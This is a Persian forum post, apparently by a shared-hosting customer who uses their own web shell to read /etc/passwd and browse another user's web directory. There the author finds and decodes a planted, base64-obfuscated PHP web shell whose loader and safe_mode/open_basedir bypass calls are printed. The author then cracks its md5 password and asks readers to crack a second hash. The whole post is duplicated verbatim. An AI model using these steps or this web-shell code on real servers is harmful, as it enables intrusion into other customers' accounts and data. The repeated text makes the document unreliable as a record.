eshpilen
جمعه 28 بهمن 1390, 11:55 صبح
ابتدا وبشل پرل خود را اجرا میکنیم.
شروع به تایپینگ فرمانها:
cd /home
Prompt وبشل:
[myacc: /home]$
ls -ld .
خروجی:
drwx--x--x 645 root root 20480 Feb 16 16:36 .
ls -l
خروجی:
ls: .: Permission denied
omg عجب پیام قاطعانه ای!
آیا این سرور امن است؟ یا صرفا توهمی از امنیت؟
cat /etc/passwd
بخشی از خروجی:
...
akbar:x:643:644::/home/akbar:/bin/false
...
نکته: نام اکانت واقعی بخاطر مسائل امنیتی با akbar تعویض شد.
ls -l akbar
خروجی:
ls: akbar: Permission denied
حالا بذار ببینیم ما که خودمون روی این سرور اکانت داریم، ساختار دایرکتوری های اکانت چطوریه.
با اجرای این دستور PHP تست میکنیم:
<?php
echo $_SERVER['DOCUMENT_ROOT'];
?>
خروجی:
/home/myacc/domains/mydomain.com/public_html
نکته: به دلایل امنیتی، نام کاربری خودم رو با myacc عوض کردم و نام دامین رو با mydomain.
خب حالا بریم سراغ اکبر!
ls -l /home/akbar/domains
خروجی:
drwxr-xr-x 8 akbar akbar 4096 Dec 24 00:26 akbar.ir
ls -l /home/akbar/domains/akbar.ir
خروجی:
drwxr-xr-x 3 akbar akbar 4096 Feb 17 00:33 awstats
drwx------ 2 akbar akbar 4096 Sep 3 2009 logs
drwx--x--x 3 akbar akbar 4096 Sep 2 2009 public_ftp
drwxr-xr-x 10 akbar akbar 4096 Aug 10 2010 public_html
drwxr-xr-x 2 akbar akbar 4096 Sep 3 2009 stats
cd /home/akbar/domains/akbar.ir/public_html
Prompt وبشل:
[myacc: /home/akbar/domains/akbar.ir/public_html]$
ls -l
خروجی:
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _private
drwxr-xr-x 4 akbar akbar 4096 Aug 18 2009 _vti_bin
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _vti_cnf
-rw-r--r-- 1 akbar akbar 1754 Apr 20 2008 _vti_inf.html
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _vti_log
drwxr-x--- 2 akbar akbar 4096 May 3 2008 _vti_pvt
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _vti_txt
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 cgi-bin
drwxr-xr-x 3 akbar akbar 4096 May 6 2008 images
-rw-r--r-- 1 akbar akbar 81299 Jul 18 2010 img.php
-rw-r--r-- 1 akbar akbar 10349 May 6 2008 index.htm
-rw-r--r-- 1 akbar akbar 61360 May 6 2008 pege1.htm
-rw-r--r-- 1 akbar akbar 9447 May 6 2008 pege2.htm
-rw-r--r-- 1 akbar akbar 9295 May 6 2008 pege4.htm
-rw-r--r-- 1 akbar akbar 7964 May 6 2008 pege5.htm
-rw-r--r-- 1 akbar akbar 7868 May 6 2008 pege6.htm
-rw-r--r-- 1 akbar akbar 2445 Apr 20 2008 postinfo.html
-rw-r--r-- 1 akbar akbar 205726 Aug 10 2010 seecur.php
این فایل seecur.php توجه منو جلب کرد چون اسمش شبیه security هست. بریم ببینیم شاید توش پسوردی چیزی پیدا شد.
cat seecur.php
خروجی:
<?php
//include variable
$host = $_SERVER['HTTP_HOST'];
$uri = rtrim(dirname($_SERVER['PHP_SELF']), '/\\');
// $auth = 1; ( authentification = On )
// $auth = 0; ( authentification = Off )
$auth = 1;
// (Login & Password for access)
// !!! (CHANGE THIS!!!)
// Login & password crypted with md5, default is 'bilakh'
$name='86318e52f5ed4801abe1d13d509443de'; // (user login)
$pass='86318e52f5ed4801abe1d13d509443de'; //(user password)
/************************************************** ************************************************** **/
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('www-Authenticate: Basic realm=');
header('HTTP/1.0 401 Unauthorized');
exit;
}
}
eval("?>".base64_decode("PD9waHANCg0KIyoqKioqKioqKioqKioqKioqKioqKioqKi
...
بعلت طولانی بودن، کدها کوتاه شد.
خب ما این کد را بوسیله کد PHP زیر رمزگشایی میکنیم تا ببینیم چیه (هرچند تا همینجا از اون bilakh + رمزگذاری کدها میشه حدس زد):
file_put_contents('out.txt', base64_decode("PD9waHANCg0KIyoqKioqKioqKioqKioqKioqKioqKioqKioqKi oqKioq...
حالا محتویات فایل out.txt را بررسی میکنیم:
<?php
#*********************************************
# #attack3rz
# Altred by Ac Team ak
# http://www.h4ckz.net
#*********************************************
error_reporting(0);
$language='eng';
$auth = 0;
$name='eea73055a0cd895bf7400a0ac0a7be0b';
$pass='eea73055a0cd895bf7400a0ac0a7be0b';
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
...
بله فکر میکنم مطمئن گشتیم که یک نفر قبل از ما اینجا بوده!!
راستی اون هش 86318e52f5ed4801abe1d13d509443de رو هم دادم به سایت md5-decrypter.com میگه صاحبش ali است :متفکر:
علی هکر کجایی که خودت هک شدی :بامزه:
هش eea73055a0cd895bf7400a0ac0a7be0b رو نتونستم کرک کنم. کسی اگر فهمید رشتهء اولیه چی بوده بگه.
شروع به تایپینگ فرمانها:
cd /home
Prompt وبشل:
[myacc: /home]$
ls -ld .
خروجی:
drwx--x--x 645 root root 20480 Feb 16 16:36 .
ls -l
خروجی:
ls: .: Permission denied
omg عجب پیام قاطعانه ای!
آیا این سرور امن است؟ یا صرفا توهمی از امنیت؟
cat /etc/passwd
بخشی از خروجی:
...
akbar:x:643:644::/home/akbar:/bin/false
...
نکته: نام اکانت واقعی بخاطر مسائل امنیتی با akbar تعویض شد.
ls -l akbar
خروجی:
ls: akbar: Permission denied
حالا بذار ببینیم ما که خودمون روی این سرور اکانت داریم، ساختار دایرکتوری های اکانت چطوریه.
با اجرای این دستور PHP تست میکنیم:
<?php
echo $_SERVER['DOCUMENT_ROOT'];
?>
خروجی:
/home/myacc/domains/mydomain.com/public_html
نکته: به دلایل امنیتی، نام کاربری خودم رو با myacc عوض کردم و نام دامین رو با mydomain.
خب حالا بریم سراغ اکبر!
ls -l /home/akbar/domains
خروجی:
drwxr-xr-x 8 akbar akbar 4096 Dec 24 00:26 akbar.ir
ls -l /home/akbar/domains/akbar.ir
خروجی:
drwxr-xr-x 3 akbar akbar 4096 Feb 17 00:33 awstats
drwx------ 2 akbar akbar 4096 Sep 3 2009 logs
drwx--x--x 3 akbar akbar 4096 Sep 2 2009 public_ftp
drwxr-xr-x 10 akbar akbar 4096 Aug 10 2010 public_html
drwxr-xr-x 2 akbar akbar 4096 Sep 3 2009 stats
cd /home/akbar/domains/akbar.ir/public_html
Prompt وبشل:
[myacc: /home/akbar/domains/akbar.ir/public_html]$
ls -l
خروجی:
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _private
drwxr-xr-x 4 akbar akbar 4096 Aug 18 2009 _vti_bin
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _vti_cnf
-rw-r--r-- 1 akbar akbar 1754 Apr 20 2008 _vti_inf.html
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _vti_log
drwxr-x--- 2 akbar akbar 4096 May 3 2008 _vti_pvt
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 _vti_txt
drwxr-xr-x 2 akbar akbar 4096 Apr 20 2008 cgi-bin
drwxr-xr-x 3 akbar akbar 4096 May 6 2008 images
-rw-r--r-- 1 akbar akbar 81299 Jul 18 2010 img.php
-rw-r--r-- 1 akbar akbar 10349 May 6 2008 index.htm
-rw-r--r-- 1 akbar akbar 61360 May 6 2008 pege1.htm
-rw-r--r-- 1 akbar akbar 9447 May 6 2008 pege2.htm
-rw-r--r-- 1 akbar akbar 9295 May 6 2008 pege4.htm
-rw-r--r-- 1 akbar akbar 7964 May 6 2008 pege5.htm
-rw-r--r-- 1 akbar akbar 7868 May 6 2008 pege6.htm
-rw-r--r-- 1 akbar akbar 2445 Apr 20 2008 postinfo.html
-rw-r--r-- 1 akbar akbar 205726 Aug 10 2010 seecur.php
این فایل seecur.php توجه منو جلب کرد چون اسمش شبیه security هست. بریم ببینیم شاید توش پسوردی چیزی پیدا شد.
cat seecur.php
خروجی:
<?php
//include variable
$host = $_SERVER['HTTP_HOST'];
$uri = rtrim(dirname($_SERVER['PHP_SELF']), '/\\');
// $auth = 1; ( authentification = On )
// $auth = 0; ( authentification = Off )
$auth = 1;
// (Login & Password for access)
// !!! (CHANGE THIS!!!)
// Login & password crypted with md5, default is 'bilakh'
$name='86318e52f5ed4801abe1d13d509443de'; // (user login)
$pass='86318e52f5ed4801abe1d13d509443de'; //(user password)
/************************************************** ************************************************** **/
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('www-Authenticate: Basic realm=');
header('HTTP/1.0 401 Unauthorized');
exit;
}
}
eval("?>".base64_decode("PD9waHANCg0KIyoqKioqKioqKioqKioqKioqKioqKioqKi
...
بعلت طولانی بودن، کدها کوتاه شد.
خب ما این کد را بوسیله کد PHP زیر رمزگشایی میکنیم تا ببینیم چیه (هرچند تا همینجا از اون bilakh + رمزگذاری کدها میشه حدس زد):
file_put_contents('out.txt', base64_decode("PD9waHANCg0KIyoqKioqKioqKioqKioqKioqKioqKioqKioqKi oqKioq...
حالا محتویات فایل out.txt را بررسی میکنیم:
<?php
#*********************************************
# #attack3rz
# Altred by Ac Team ak
# http://www.h4ckz.net
#*********************************************
error_reporting(0);
$language='eng';
$auth = 0;
$name='eea73055a0cd895bf7400a0ac0a7be0b';
$pass='eea73055a0cd895bf7400a0ac0a7be0b';
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
...
بله فکر میکنم مطمئن گشتیم که یک نفر قبل از ما اینجا بوده!!
راستی اون هش 86318e52f5ed4801abe1d13d509443de رو هم دادم به سایت md5-decrypter.com میگه صاحبش ali است :متفکر:
علی هکر کجایی که خودت هک شدی :بامزه:
هش eea73055a0cd895bf7400a0ac0a7be0b رو نتونستم کرک کنم. کسی اگر فهمید رشتهء اولیه چی بوده بگه.